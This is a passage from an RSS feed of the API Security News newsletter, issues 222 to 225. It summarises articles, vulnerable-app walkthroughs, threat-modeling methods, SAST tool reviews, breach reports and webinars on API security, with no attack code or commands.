<p>This is a great read and addresses issues we see in many of our real-world breaches. Thanks to Matias for the contribution!</p>
<h2>Guide: vAPI walkthrough</h2>
<p>Walkthroughs and guides are always popular with our readers, and this week, <a href="https://zerodayhacker.com/vapi-walkthrough/" target="_blank" rel="noopener">we have another great contribution</a> from Edward Lichtner (<a href="https://twitter.com/EdwardLichtner" target="_blank" rel="noopener">@EdwardLichtner</a>), this time taking us through a very comprehensive tour of the <a href="https://github.com/roottusk/vapi" target="_blank" rel="noopener">vAPI</a> vulnerable API application. We have <a href="https://apisecurity.io/issue-222-attackers-exploiting-apis-faster-than-ever-dvga-walkthrough-twitter-outage/" target="_blank" rel="noopener">previously featured</a> Edward&#8217;s walkthroughs and <a href="https://apisecurity.io/issue-212-remote-control-of-vehicles-api-hacking-for-qa-teams-api-top-10-walkthrough/" target="_blank" rel="noopener">also a walkthrough</a> of the vAPI application.</p>
<p>This walkthrough is ideal for anyone starting out with API hacking since it assumes very little prior knowledge, covers the installation of the tools and environments, works through each of the OWASP API Security Top 10, and includes some bonus items. The attention to detail makes it very easy to follow the individual steps, each accompanied by a screenshot.</p>
<p>Thanks again for this excellent contribution to the community Edward; keep up the great work!</p>
<h2>Article: Five stages to attain API security</h2>
<p>The next article <a href="https://securityboulevard.com/2023/03/guest-essay-five-stages-to-attain-api-security-and-mitigate-attack-surface-exposures/" target="_blank" rel="noopener">features views from Rakshith Rao</a> on the five stages required to attain API security. The author highlights that APIs are becoming the top attack vector in 2023 (costing US companies between $12 and $23 billion in 2023 alone). He highlights some of the well-established reasons why existing security approaches are insufficient to achieve API security. In particular, outdated authorization methods and basic IP whitelisting afford scant protection. Many monitoring tools cannot monitor API activity and fail to provide any actionable information to security teams.</p>
<p>According to the author, the following five stages are key to attaining success with API security:</p>
<ol>
<li><strong>Discover:</strong> Make sure you have an up-to-date view of your API inventory. Avoid using manual methods of discovery and classification; rather, rely on being able to monitor traffic.</li>
<li><strong>Observe:</strong> Analyze what you find and assess whether it should be present — for instance, take steps to identify and classify shadow and zombie APIs.</li>
<li><strong>Model:</strong> Build views of the system&#8217;s normal behavior by understanding data models and usual patterns of use. Be able to identify anomalies based on the usual patterns.</li>
<li><strong>Act</strong>: Perform regular activities to improve API security, such as API audits, tracking and tracing API calls, responses, and errors.</li>
<li><strong>Insights:</strong> Monitor the overall status and behavior of your API ecosystem and develop a culture of continuous improvement.</li>
</ol>
<p>These are certainly great recommendations for a journey toward improved API security, but the devil is in the detail as ever.</p>
<h2>Guide: Exploiting GraphQL endpoints</h2>
<p>Finally, this week, <a href="https://blog.yeswehack.com/yeswerhackers/how-exploit-graphql-endpoint-bug-bounty/" target="_blank" rel="noopener">we have another guide</a> focusing on the basics of exploiting GraphQL endpoints using introspection, query, mutations, and tools. The article briefly introduces attacking GraphQL endpoints and assumes little prior knowledge.</p>
<p>Firstly, the article describes how to find common GraphQL endpoints using wordlists of common endpoints and then how to use introspection to gain further detail on the endpoints. Typically, introspection allows a user to discover the full schema of an endpoint, including the query, mutations, objects, fields, etc. In the event that introspection is disabled (it should be if you are serious about security!), then it is possible to use fuzzing techniques to build a map of the API. The author then looks at several different flaw types, such as query flaws (showing an example of BOLA) and mutation flaws (showing an example of mass assignment).</p>
<p>Finally, the author recommends some resources for further learning, namely:</p>
<ul>
<li>GraphQL Voyager</li>
<li>InQL (Burp Suite)</li>
<li>“Damn Vulnerable GraphQL Application” vulnerable API application</li>
<li>“PoC graphql” vulnerable API application</li>
</ul>
<h2>Webinar: Something Old, Something New – OWASP API Security Top 10 in 2023</h2>
<p>The OWASP API Security project has recently updated its Top 10 list of vulnerabilities that are commonly found in APIs. This list includes both well-known issues and new ones that are currently affecting APIs in the real world. It is crucial for those involved in the API industry to stay informed about these top threats and the OWASP Top 10 list is an excellent resource for doing so. By staying up-to-date with the latest security challenges, API professionals can better protect their systems and ensure the safety of their users&#8217; data.</p>
<p><a href="https://42crunch.com/something-old-something-new-owasp-api-security-top-10-2023/" target="_blank" rel="noopener">Join Colin Domoney</a> (Chief Technology Evangelist) from 42Crunch at 9am PDT | 5pm BST on 1 August, 2023 as he takes a closer look at the 2023 Top 10, including:</p>
<ul>
<li>an overview of his research into API vulnerabilities of the last 12 months.</li>
<li>the items dropping off the list and whether they are still a concern.</li>
<li>the items remaining unchanged, and why they are more of a concern than ever.</li>
<li>the three new items and why they warrant attention in 2023.</li>
<li>we will also look at how 42Crunch can help you address these new items.</li>
</ul>
<p>Join us to get the inside track on the new Top 10 concerns for API developers.</p>
<p><a href="https://42crunch.com/something-old-something-new-owasp-api-security-top-10-2023/" target="_blank" rel="noopener"><img loading="lazy" decoding="async" class="alignnone wp-image-10810" src="https://apisecurity.io/wp-content/uploads/2023/07/Screenshot-2023-07-24-at-11.46.07-1024x234.png" alt="" width="601" height="137" srcset="https://apisecurity.io/wp-content/uploads/2023/07/Screenshot-2023-07-24-at-11.46.07-1024x234.png 1024w, https://apisecurity.io/wp-content/uploads/2023/07/Screenshot-2023-07-24-at-11.46.07-300x68.png 300w, https://apisecurity.io/wp-content/uploads/2023/07/Screenshot-2023-07-24-at-11.46.07-768x175.png 768w, https://apisecurity.io/wp-content/uploads/2023/07/Screenshot-2023-07-24-at-11.46.07-1536x350.png 1536w, https://apisecurity.io/wp-content/uploads/2023/07/Screenshot-2023-07-24-at-11.46.07-2048x467.png 2048w" sizes="auto, (max-width: 601px) 100vw, 601px" /></a></p>
<p>The post <a href="https://apisecurity.io/issue-225-api-security-needs-a-reset-vapi-walkthrough-five-stages-to-attain-api-security/">Issue 225 : API security needs a reset, vAPI walkthrough, five stages to attain API security</a> appeared first on <a href="https://apisecurity.io/">API Security News</a>.</p>
]]></content:encoded>
					
		
		
			</item>
		<item>
		<title>Issue 224 : API security is critical in 2023, API contract testing, and Fencer security testing tool</title>
		<link>https://apisecurity.io/issue-224-api-security-is-critical-in-2023-api-contract-testing-and-fencer-security-testing-tool/</link>
		
		<dc:creator><![CDATA[Mark Dolan]]></dc:creator>
		<pubDate>Thu, 06 Jul 2023 13:53:51 +0000</pubDate>
				<category><![CDATA[Newsletter Archive]]></category>
		<guid isPermaLink="false">https://apisecurity.io/?p=10765</guid>

					<description><![CDATA[<p>This week, we have an article from Forbes on why API security is critical in 2023, views from Kin Lane on being pedantic about API contract testing, and a preview of a new tool for API security testing. We also have details of an upcoming webinar on API security within a GitHub environment. Article: Why [...]</p>
<p><a class="btn btn-secondary understrap-read-more-link" href="https://apisecurity.io/issue-224-api-security-is-critical-in-2023-api-contract-testing-and-fencer-security-testing-tool/">Read More...</a></p>
<p>The post <a href="https://apisecurity.io/issue-224-api-security-is-critical-in-2023-api-contract-testing-and-fencer-security-testing-tool/">Issue 224 : API security is critical in 2023, API contract testing, and Fencer security testing tool</a> appeared first on <a href="https://apisecurity.io/">API Security News</a>.</p>
]]></description>
										<content:encoded><![CDATA[<p>This week, we have an article from Forbes on why API security is critical in 2023, views from Kin Lane on being pedantic about API contract testing, and a preview of a new tool for API security testing. We also have details of an upcoming webinar on API security within a GitHub environment.</p>
<h2>Article: Why API security is critical in 2023</h2>
<p>The first article this week <a href="https://www.forbes.com/sites/forbestechcouncil/2023/03/09/preventing-data-breaches-in-2023-why-api-security-is-critical/?sh=587d294a442b" target="_blank" rel="noopener">comes courtesy of Forbes</a>, which gives a great overview of the state of API security in 2023. The author is of the oft-held view that APIs are the number one attack vector for attackers in 2023, quoting data from Imperva&#8217;s <em>&#8220;Quantifying the Cost of API Insecurity&#8221;</em> (<a href="https://apisecurity.io/issue-192-vulnerable-apis-costing-75-billion-new-google-api-security-platform/" target="_blank" rel="noopener">covered here in issue 192</a>), which suggests that the annual API-related cyber loss in the U.S. alone reached between $12 and $23 billion.</p>
<p>The report looks at the various dimensions of API security, from consumer privacy to public safety to intellectual property, and how these have been impacted recently.</p>
<p>Firstly when considering consumer privacy, one needs to look no further than some of the API &#8220;mega breaches&#8221; I have covered in the last 18 months. Firstly the ongoing Twitter API breach (<a href="https://apisecurity.io/issue-217-wordle-api-exposes-answers-twitter-api-breach-updates-aws-exposed-dangerous-api/" target="_blank" rel="noopener">covered most recently in issue 217</a>) has leaked the personal information of up to 200 million users, according to some estimates. A breach of this scale allows attackers to launch large-scale spear phishing attacks against Twitter users to take over their accounts. Secondly, the Optus breach (<a href="https://apisecurity.io/issue-203-optus-data-breach-api-security-guide-authn-authz-vulnerabilities/" target="_blank" rel="noopener">covered here in issue 203</a>) led to the disclosure of the PII of up to 2.1 million Australian citizens. To these examples, I would add the T-Mobile API data breach from the beginning of 2023, which leaked over 37 million account holders&#8217; details.</p>
<p>Secondly &#8211; and probably even more serious &#8211; is the impact on public safety resulting from insecure APIs. The automotive industry springs to mind for a poor record regarding API security, with the most notable example being the research done by Sam Curry into connected vehicles, particularly focusing on their APIs. Early in 2023, Curry&#8217;s research revealed flaws in the API of the vehicle management system for Hyundai and Genesis vehicles (<a href="https://apisecurity.io/issue-212-remote-control-of-vehicles-api-hacking-for-qa-teams-api-top-10-walkthrough/" target="_blank" rel="noopener">covered here in issue 212</a>) which leaked customer confidential information, including vehicle ID numbers (VID). Of more concern was the fact that the researcher could also gain access to the vehicle management system allowing him to control the vehicle&#8217;s locks and engine. This is about as serious a scenario as one could get regarding public safety.</p>
<p>Thirdly, the author highlights the significance of API security failings with regard to intellectual property, citing the example of the CircleCI vulnerability, which allowed an attacker to steal or generate new project and personal API tokens. This attack vector could potentially allow an attacker to control the build of any software system using CircleCI and either steal the intellectual property (source code) or subvert the build and release process to inject malware. In this newsletter, we covered similar vulnerabilities affecting the Argo CD platform (<a href="https://apisecurity.io/issue-218-three-argo-cd-api-exploits-distributed-identity-for-modern-api-security/" target="_blank" rel="noopener">in issue 218</a>) and the GoCD CI/CD platform (<a href="https://apisecurity.io/issue-159-vulnerability-gocd-ci-cd-platform-views-full-lifecycle-api-security-articles-api-security-sprawl/" target="_blank" rel="noopener">in issue 159</a>).</p>
<p>I found this to be an excellent article that really highlights the three main API security concerns in 2023: the &#8220;mega breach&#8221;, personal safety, and intellectual property concerns. As the author concludes, the only way to address this problem is to tackle the root cause by investing in API security.</p>
<h2>Article: Getting pedantic about API contract testing</h2>
<p>The <a href="https://apievangelist.com/2023/02/23/getting-pedantic-about-api-contract-testing/" target="_blank" rel="noopener">next article comes courtesy of Kin Lane</a> (<a href="https://twitter.com/apievangelist" target="_blank" rel="noopener">@apievangelist</a>), discussing the finer details of API contract testing. This article gives an overview of various API testing strategies based on the Postman API development tool. Lane&#8217;s central argument is that many teams feel they are doing API contract testing when in fact, they are only performing basic testing of the API based on the Postman collection (I would be inclined to call this acceptance testing — it tests that the API behaves in the expected way but nothing beyond this).</p>
<p>To perform genuine contract testing, the first requirement is an OpenAPI definition of your API. In the case of an API design-first strategy, this will already exist as part of the API design process. In the case of a code-first strategy, the team will need to use a proxy or intercept tool to capture the OpenAPI definition from observed network traffic (Postman has this capability natively). Alternatively this OpenAPI definition can be extracted from the API gateway.</p>
<p>Lane advocates a design-first approach where the OpenAPI definition can be used to generate the API collection in Postman from the definition and, in fact, also generate the gateway configuration and policies and the API client and server code from said definition. Finally, by adding various annotations to the OpenAPI definition (particularly on JSON schema), it is possible to fully define the request and response data, including minimum and maximum lengths and other JSON data properties. This is shown diagrammatically below:</p>
<p><img loading="lazy" decoding="async" class="alignnone size-full wp-image-10798" src="https://apisecurity.io/wp-content/uploads/2023/07/Article2.jpg" alt="" width="960" height="457" srcset="https://apisecurity.io/wp-content/uploads/2023/07/Article2.jpg 960w, https://apisecurity.io/wp-content/uploads/2023/07/Article2-300x143.jpg 300w, https://apisecurity.io/wp-content/uploads/2023/07/Article2-768x366.jpg 768w" sizes="auto, (max-width: 960px) 100vw, 960px" /></p>
<p>As an advocate of a design-first approach, I would always recommend starting with a fully defined API definition (including comprehensive definitions of data structures) and using this to generate all downstream artifacts, including documentation, mocks and stubs, test scripts, and client and server code stubs.</p>
<h2>Tools: Fencer automated API security testing tool</h2>
<p>Finally, this week, <a href="https://github.com/abunuwas/fencer" target="_blank" rel="noopener">we take a quick look</a> at a new API security testing tool from José Haro Peralta (<a href="https://twitter.com/JoseHaroPeralta" target="_blank" rel="noopener">@JoseHaroPeralta</a>) called <em>fencer</em>. The tool is described as an automated API security testing tool, with the goal of seeing how much of the API security testing process can be automated. The project&#8217;s initial focus is on the OWASP API Security Top 10 and then to extend beyond this to other common API security vulnerabilities.</p>
<p>The author concedes that the project is in the infancy stage and will require additional work to add a full suite of features. He welcomes contributions or suggestions for features, so any interested readers should get in touch. Certainly, in my experience, there is a dearth of API security-specific testing tools, and any work in this space is valuable. Thanks to Jose for the contribution to the community, and I look forward to updates in the near future.</p>
<h2>Webinar: Mastering secure API development with GitHub and 42Crunch</h2>
<p><a href="https://42crunch.com/mastering-secure-api-development-with-github-and-42crunch/" target="_blank" rel="noopener">Join Isabelle Mauny (Field CTO) and Colin Domoney (​​Chief Technology Evangelist)</a> from 42Crunch next Thursday, July 13 at 9 am PDT  / 5 pm BST as they take a deep dive with live demos into how 42Crunch combines with GitHub to facilitate secure API development:</p>
<p>This practical demo will showcase the following:</p>
<ul>
<li>Discover OpenAPI definitions automatically within repositories.</li>
<li>Audit OpenAPI definitions in GitHub Actions and view results alongside other code scanning tools all in a single view.</li>
<li>Scan your API for security vulnerabilities directly within GitHub Actions.</li>
<li>Deploy the 42Crunch API firewall within GitHub Actions.</li>
<li>Protect your main branch by performing automated testing of APIs directly within the pull request process, allowing informed risk-based decisions for reviewers.</li>
<li>Using the 42Crunch GitHub application to enrich the pull request annotations further, allowing better decision-making for the reviewer.</li>
<li>Drive the entire process without ever leaving VS Code!</li>
</ul>
<p>Learn how to seamlessly integrate 42Crunch within GitHub to prevent vulnerable APIs from ever entering your repository.</p>
<p><a href="https://42crunch.com/mastering-secure-api-development-with-github-and-42crunch/" target="_blank" rel="noopener"><img loading="lazy" decoding="async" class="alignnone wp-image-10788" src="https://apisecurity.io/wp-content/uploads/2023/07/Article5.jpg" alt="" width="601" height="336" srcset="https://apisecurity.io/wp-content/uploads/2023/07/Article5.jpg 500w, https://apisecurity.io/wp-content/uploads/2023/07/Article5-300x168.jpg 300w" sizes="auto, (max-width: 601px) 100vw, 601px" /></a></p>
<p>The post <a href="https://apisecurity.io/issue-224-api-security-is-critical-in-2023-api-contract-testing-and-fencer-security-testing-tool/">Issue 224 : API security is critical in 2023, API contract testing, and Fencer security testing tool</a> appeared first on <a href="https://apisecurity.io/">API Security News</a>.</p>
]]></content:encoded>
					
		
		
			</item>
		<item>
		<title>Issue 223 : Becoming an API security expert, AI for API hackers, building API cross-functional teams</title>
		<link>https://apisecurity.io/issue-223-becoming-an-api-security-expert-ai-for-api-hackers-building-api-cross-functional-teams/</link>
		
		<dc:creator><![CDATA[Mark Dolan]]></dc:creator>
		<pubDate>Sun, 25 Jun 2023 19:16:58 +0000</pubDate>
				<category><![CDATA[Newsletter Archive]]></category>
		<guid isPermaLink="false">https://apisecurity.io/?p=10696</guid>

					<description><![CDATA[<p>This week, we have an article from The New Stack on mastering the skills necessary to become an API security expert and another fine read from Dana Epp on the applicability of artificial intelligence (AI) in API defense and attack. We also have an article from Forbes on building cross-functional API teams and, finally, a [...]</p>
<p><a class="btn btn-secondary understrap-read-more-link" href="https://apisecurity.io/issue-223-becoming-an-api-security-expert-ai-for-api-hackers-building-api-cross-functional-teams/">Read More...</a></p>
<p>The post <a href="https://apisecurity.io/issue-223-becoming-an-api-security-expert-ai-for-api-hackers-building-api-cross-functional-teams/">Issue 223 : Becoming an API security expert, AI for API hackers, building API cross-functional teams</a> appeared first on <a href="https://apisecurity.io/">API Security News</a>.</p>
]]></description>
										<content:encoded><![CDATA[<p>This week, we have an article from The New Stack on mastering the skills necessary to become an API security expert and another fine read from Dana Epp on the applicability of artificial intelligence (AI) in API defense and attack. We also have an article from Forbes on building cross-functional API teams and, finally, a review of two popular, modern static application security (SAST) tools.</p>
<p>For the readers fortunate enough to have attended Infosecurity 2023 who made an effort to come and say hello, I appreciate your support and feedback.</p>
<h2>Article: Becoming an API security expert</h2>
<p>First up this week, we have <a href="https://thenewstack.io/so-you-want-to-be-an-api-security-expert/" target="_blank" rel="noopener">an article from The New Stack</a> on how to master the skills necessary to become an API security expert, primarily how to think like an attacker. The author believes that whilst many security professionals will have adequate knowledge of their API inventory, their changes in the threat landscape, and their potential for exposure, they are limited in their effectiveness if they cannot think like an attacker. Only by thinking like an attacker can the defender anticipate the tactics and techniques likely to be used and thereby be able to incorporate the appropriate countermeasures and defenses.</p>
<p>The author recommends security professionals learn the technique of threat modeling to understand their threat environment. A standard threat modeling lifecycle is shown below; this consists of the following stages: setting objectives, decomposition, threat identification, risk evaluation, and finally, assessment.</p>
<p><img loading="lazy" decoding="async" class="alignnone wp-image-10751" src="https://apisecurity.io/wp-content/uploads/2023/06/Article1-1-1024x682.jpg" alt="" width="602" height="401" srcset="https://apisecurity.io/wp-content/uploads/2023/06/Article1-1-1024x682.jpg 1024w, https://apisecurity.io/wp-content/uploads/2023/06/Article1-1-300x200.jpg 300w, https://apisecurity.io/wp-content/uploads/2023/06/Article1-1-768x511.jpg 768w, https://apisecurity.io/wp-content/uploads/2023/06/Article1-1.jpg 1431w" sizes="auto, (max-width: 602px) 100vw, 602px" /></p>
<p>The author suggests using two popular threat modeling methodologies: Microsoft&#8217;s STRIDE methodology or their DREAD methodology. The two are highlighted in tabular form:</p>
<table>
<tbody>
<tr>
<td><strong>Category</strong></td>
<td><strong>  Impact on scoring system     </strong></td>
</tr>
<tr>
<td><strong>S</strong></td>
<td><em>Spoofing</em></td>
<td>Impersonation of a valid user or resource to gain unauthorized access.</td>
</tr>
<tr>
<td><strong>T</strong></td>
<td><em>Tampering</em></td>
<td>Modification of system or user data with or without detection.</td>
</tr>
<tr>
<td><strong>R</strong></td>
<td><em>Repudiation</em></td>
<td>Execution of an untrusted or illegal operation in an untraceable way.</td>
</tr>
<tr>
<td><strong>I</strong></td>
<td><em>Information Disclosure</em></td>
<td>Exfiltration of private and/or business-critical information.</td>
</tr>
<tr>
<td><strong>D</strong></td>
<td><em>Denial of Service</em></td>
<td>Attack on a system that leaves it temporarily unavailable or unusable.</td>
</tr>
<tr>
<td><strong>E</strong></td>
<td><em>Elevation of Privilege</em></td>
<td>Tactic where an attacker gains privileged access to a system with the ability to compromise or destroy it.</td>
</tr>
</tbody>
</table>
<p>&nbsp;</p>
<div class="table-scroll-wrap">
<table>
<tbody>
<tr>
<td><strong>Category</strong></td>
<td><strong> Impact on scoring system   </strong></td>
</tr>
<tr>
<td><strong>D</strong></td>
<td><em>Damage</em></td>
<td>How bad would an attack be?</td>
</tr>
<tr>
<td><strong>R</strong></td>
<td><em>Reproducibility</em></td>
<td>Can an attack be easily reproduced?</td>
</tr>
<tr>
<td><strong>E</strong></td>
<td><em>Exploitability</em></td>
<td>How easy is it to mount a successful attack?</td>
</tr>
<tr>
<td><strong>A</strong></td>
<td><em>Affected Users</em></td>
<td>How many users are impacted?</td>
</tr>
<tr>
<td><strong>D</strong></td>
<td><em>Discoverability</em></td>
<td>What is the likelihood of this threat being discovered?</td>
</tr>
</tbody>
</table>
</div>
<p>To use the threat models, the security team performs an analysis of their system, asking the following four key questions (from the <a href="https://www.threatmodelingmanifesto.org/" target="_blank" rel="noopener">Threat Modeling Manifesto</a>):</p>
<ol>
<li><strong>What are we working on?</strong> This involves defining the scope of their system and its components and environment.</li>
<li><strong>How can it go wrong?</strong> Identify the threats to the system.</li>
<li><strong>What are we going to do about it?</strong> Define the countermeasures, controls, and defenses.</li>
<li><strong>Did we do a good enough job?</strong> Did the countermeasures work as intended?</li>
</ol>
<p>I strongly advocate for threat modeling and believe it has great potential with application to API security. Although this article only scratches the surface, it is encouraging to see the topic being discussed.</p>
<h2>Article: AI for API hackers</h2>
<p>Next up is <a href="https://danaepp.com/is-offensive-ai-going-to-be-a-problem-for-api-hackers" target="_blank" rel="noopener">another great read from Dana Epp</a>, focusing on the impacts of Artificial Intelligence (AI) on API hackers. Although oriented toward API hackers and attackers, it is a great read on understanding the impact of AI on security in general. Being late to the game myself, I found this a fascinating read.</p>
<p>Dana&#8217;s first observation is a general note of caution for organizations using AI (typically ChatGPT or BingChat) in their development process. Firstly he highlights the example where Amazon has warned staff not to use ChatGPT for coding assistance in case proprietary source code lands in the hands of a close competitor. Secondly, there is a concern that GitHub Copilot has the potential to leak closed-source intellectual property even if the underlying repositories are set to private accesses. This is a function of how Copilot analyses and stores code snippets, and there are already examples of copyrighted code being leaked in AI-generated code. Thirdly, AI-generated code could itself be malicious and should not be trusted by default.</p>
<p>Dana takes a look at the various ways in which AI can be used in a defensive context that are currently in the market; these include the following solutions:</p>
<ul>
<li>Anomaly detection systems that use traffic monitoring to detect deviation from baselines.</li>
<li>Profiling API users and clients to detect abnormal behavior patterns.</li>
<li>Performing content analysis to inspect API payloads for malicious code or data leakage.</li>
<li>Automatic blocking for responses based on the detection of malicious requests or responses.</li>
</ul>
<p>He then speculates on some possible future defensive solutions, including:</p>
<ul>
<li>Dynamic adaptation to changing threats and environments allows for automatic rule updates.</li>
<li>Defensive solutions can potentially scale across very large networks and volumes of data without compromising performance or accuracy.</li>
<li>Defensive solutions can anticipate potential attacks and act proactively to defend the target.</li>
</ul>
<p>Dana concludes with potential ways in which AI can, in turn, be used to thwart some of the new defensive capabilities. The use of AI for both attack and defense is likely to rapidly evolve into a cat-and-mouse game — certainly, the defense has first mover advantage. Still, the widespread availability of powerful AI tools will soon place powerful capabilities in the hands of attackers.</p>
<h2>Article: Building API cross-functional teams</h2>
<p>The next article is an <a href="https://www.forbes.com/sites/forbestechcouncil/2023/03/10/building-a-comprehensive-api-ecosystem-the-importance-of-cross-functional-team-collaboration/?sh=2fde6e447535" target="_blank" rel="noopener">article courtesy of Forbes</a> on the importance of cross-functional teams for API development. The report reveals the staggering scale of the global API management market value, which is expected to reach $8.36 billion by 2028. However, the author cautions that a more mature process needs to be applied to the API creation process, including creating more roles across the ecosystem.</p>
<p>The key takeaway from the report is how cross-functional teams help deliver the promises of the API economy. The author suggests that whilst the API economy has the potential to unlock great value, many organizations have yet to see the real return on investment and value. Specifically, they identify four primary benefits to a more diverse API ecosystem, namely:</p>
<ul>
<li><strong>Better API design:</strong> good design ensures that APIs are secure, scalable, and aligned to business objectives.</li>
<li><strong>Improved API adoption:</strong> including stakeholders in the process can increase API adoption and drive usage.</li>
<li>M<strong>ore effective API monetization:</strong>  a more diverse team can result in greater insights into how to monetize APIs.</li>
<li><strong>Enhanced API security:</strong> most important for our readers is the positive impact that diverse teams can have on improving API security. Diversity in team experience can lead to a more holistic approach to security, from defensive techniques to protection against threats. When growing your API security team, always select a diversity of skills and backgrounds, and be sure you create a collaborative culture within the team.</li>
</ul>
<p>The report identifies eight key personas are focus areas for enablement:</p>
<ol>
<li>Providers: focus on frictionless and automated planning, designing, building, and running of APIs.</li>
<li>Consumers: focus on ease of discovery and consumption.</li>
<li>API product managers and business analysts: responsible for aligning the API to the business objectives.</li>
<li>API platform team: responsible for building and scaling a well-governed API program.</li>
<li>Support and DevOps: monitor APIs to enhance reliability and stability.</li>
<li>Governance and security teams: ensure that APIs are compliant and secure.</li>
<li>Orchestration teams: integrate APIs with the wider IT landscape.</li>
<li>Leadership stakeholders: focuses on the maturity, value, and ROI of APIs.</li>
</ol>
<p>It&#8217;s always interesting to read views on the business of APIs, and it is encouraging to see the increasing focus on API security as a core element of a mature strategy.</p>
<h2>Article: Deep dive on modern SAST tools</h2>
<p>Finally, this week, <a href="https://goingbeyondgrep.com/posts/a-deeper-look-at-modern-sast-tools/" target="_blank" rel="noopener">we have a deep dive</a> into modern static application security testing (SAST) tools. I always advocate for using SAST to establish a baseline software security program since the last decade has seen dramatic improvements in the capabilities of SAST tools. In particular great strides have been made in the performance (execution times) and accuracy (false positive and false negative rates) of these tools. This article looks at two of the most popular low-cost (and, in some situations, totally free) tools on the market: GitHub&#8217;s <strong>CodeQL</strong> and R2C&#8217;s <strong>Semgrep</strong>.</p>
<p>The author provides a detailed analysis based on the following criteria: licensing terms and conditions, tooling support (typically IDE and CI/CD integrations), and language support. Although the author does not select an outright winner, both tools offer great opportunities for security teams to improve the security posture of their codebases. Ultimately the final choice will be dictated by the languages used and the deployment environments.</p>
<p>It&#8217;s always good to see coverage on SAST tools — if you establish an API security practice, you would be well advised to consider these two fine products.</p>
<h2>Event: apidays Interface 2023</h2>
<p>I will be speaking at the upcoming <a href="https://www.apidays.global/interface/" target="_blank" rel="noopener">apidays Interface 2023</a> online event on the topic of &#8211; you guessed it &#8211; the recent changes to the OWASP API Security Top 10 recently announced. I&#8217;ll focus on the new flaw categories introduced, particularly looking at real-world examples of these flaws resulting in vulnerabilities.</p>
<p>Join me (and several of our other frequent contributors to the newsletter) on the 28th and 29th June 2023, as we cover everything relating to APIs, including security.</p>
<p><a href="https://www.apidays.global/interface/" target="_blank" rel="noopener"><img loading="lazy" decoding="async" class="alignnone wp-image-10748" src="https://apisecurity.io/wp-content/uploads/2023/06/Article5-1-1024x536.jpg" alt="" width="608" height="318" srcset="https://apisecurity.io/wp-content/uploads/2023/06/Article5-1-1024x536.jpg 1024w, https://apisecurity.io/wp-content/uploads/2023/06/Article5-1-300x157.jpg 300w, https://apisecurity.io/wp-content/uploads/2023/06/Article5-1-768x402.jpg 768w, https://apisecurity.io/wp-content/uploads/2023/06/Article5-1.jpg 1198w" sizes="auto, (max-width: 608px) 100vw, 608px" /></a></p>
<p>The post <a href="https://apisecurity.io/issue-223-becoming-an-api-security-expert-ai-for-api-hackers-building-api-cross-functional-teams/">Issue 223 : Becoming an API security expert, AI for API hackers, building API cross-functional teams</a> appeared first on <a href="https://apisecurity.io/">API Security News</a>.</p>
]]></content:encoded>
					
		
		
			</item>
		<item>
		<title>Issue 222: Attackers exploiting APIs faster than ever, DVGA walkthrough, Twitter outage</title>
		<link>https://apisecurity.io/issue-222-attackers-exploiting-apis-faster-than-ever-dvga-walkthrough-twitter-outage/</link>
		
		<dc:creator><![CDATA[Mark Dolan]]></dc:creator>
		<pubDate>Sun, 11 Jun 2023 17:44:39 +0000</pubDate>
				<category><![CDATA[Newsletter Archive]]></category>
		<guid isPermaLink="false">https://apisecurity.io/?p=10477</guid>

					<description><![CDATA[<p>This week, we have a report on how attackers are exploiting APIs faster than previously based on research into over 650 API-related vulnerabilities and a walkthrough guide into DVGA, a vulnerable GraphQL application. We also have further coverage of the Twitter API (this time an outage) and, finally, views from Dana Epp on the new [...]</p>
<p><a class="btn btn-secondary understrap-read-more-link" href="https://apisecurity.io/issue-222-attackers-exploiting-apis-faster-than-ever-dvga-walkthrough-twitter-outage/">Read More...</a></p>
<p>The post <a href="https://apisecurity.io/issue-222-attackers-exploiting-apis-faster-than-ever-dvga-walkthrough-twitter-outage/">Issue 222: Attackers exploiting APIs faster than ever, DVGA walkthrough, Twitter outage</a> appeared first on <a href="https://apisecurity.io/">API Security News</a>.</p>
]]></description>
										<content:encoded><![CDATA[<p>This week, we have a report on how attackers are exploiting APIs faster than previously based on research into over 650 API-related vulnerabilities and a walkthrough guide into <em>DVGA</em>, a vulnerable GraphQL application. We also have further coverage of the Twitter API (this time an outage) and, finally, views from Dana Epp on the new OWASP API Security Top 10. We also have news of not one but two events coming up in June.</p>
<h2>Report: Attackers are exploiting APIs faster than previously</h2>
<p>First up this week, <a href="https://www.helpnetsecurity.com/2023/03/08/api-threat-landscape/" target="_blank" rel="noopener">we have an article from Help Net Security</a> discussing how attackers exploit API vulnerabilities faster than previously thought. The research comes from Wallarm, who analyzed 350,000 vulnerability disclosures to find 650 API-specific vulnerabilities. From there, they narrowed this to 115 published exploits associated with these vulnerabilities, with the results shown in summary form below:</p>
<p><img loading="lazy" decoding="async" class="alignnone wp-image-10679" src="https://apisecurity.io/wp-content/uploads/2023/06/Article1.jpg" alt="" width="606" height="450" srcset="https://apisecurity.io/wp-content/uploads/2023/06/Article1.jpg 650w, https://apisecurity.io/wp-content/uploads/2023/06/Article1-300x223.jpg 300w" sizes="auto, (max-width: 606px) 100vw, 606px" /></p>
<p>The report concludes that based on their data from 2022, APIs are increasingly under attack with the following trends in particular:</p>
<ul>
<li><strong>Attack growth:</strong> the report indicated an increase of 197% in attacks on APIs under observation.</li>
<li><strong>CVE growth:</strong> the number of Common Vulnerabilities and Exposures (CVE) involved has grown by 78% in this time, i.e., the attacks are using a growing number of attack vectors and exploit types.</li>
<li><strong>Worsening time-to-exploit:</strong> the most concerning point is that the time-to-exploit is becoming significantly shorter, making it harder for defenders to protect their APIs. The report quotes a reduction from 58 days to practically zero or less currently, and notes that zero-day exploits exist for nearly two months before their CVE is published.</li>
</ul>
<p>The report concludes that the number of API threats tripled in 2022, and in many cases, exploits exist before the vulnerability is even published. A further note of caution warns on the prevalence of injection attacks being the primary attack vector used by attackers and that attacks are more frequently targeting the DevOps and cloud-native platforms.</p>
<h2>Guide: DVGA walkthrough</h2>
<p>How-to guides are a perennial favorite with our readers and this week, <a href="https://zerodayhacker.com/dvga-walkthrough/" target="_blank" rel="noopener">we have a great one courtesy of Edward Lichtner</a> (<a href="https://twitter.com/EdwardLichtner" target="_blank" rel="noopener">@EdwardLichtner</a>) as he takes us through the <a href="https://github.com/dolevf/Damn-Vulnerable-GraphQL-Application" target="_blank" rel="noopener">Damn Vulnerable GraphQL Application</a> (DVGA) application. Edward wrote the guide primarily as part of his documentation as he worked through the DVGA exercises but has kindly made this available to the community. It is a thorough write-up worth reading in detail if you want to learn more about GraphQL and how to attack it.</p>
<p>As a tl;dr the guide covers the following tools:</p>
<ul>
<li>Altair, which is a GraphQL client</li>
<li>graphql-introspection nmap script</li>
<li>graphw00f, which is a GraphQL server fingerprinting tool</li>
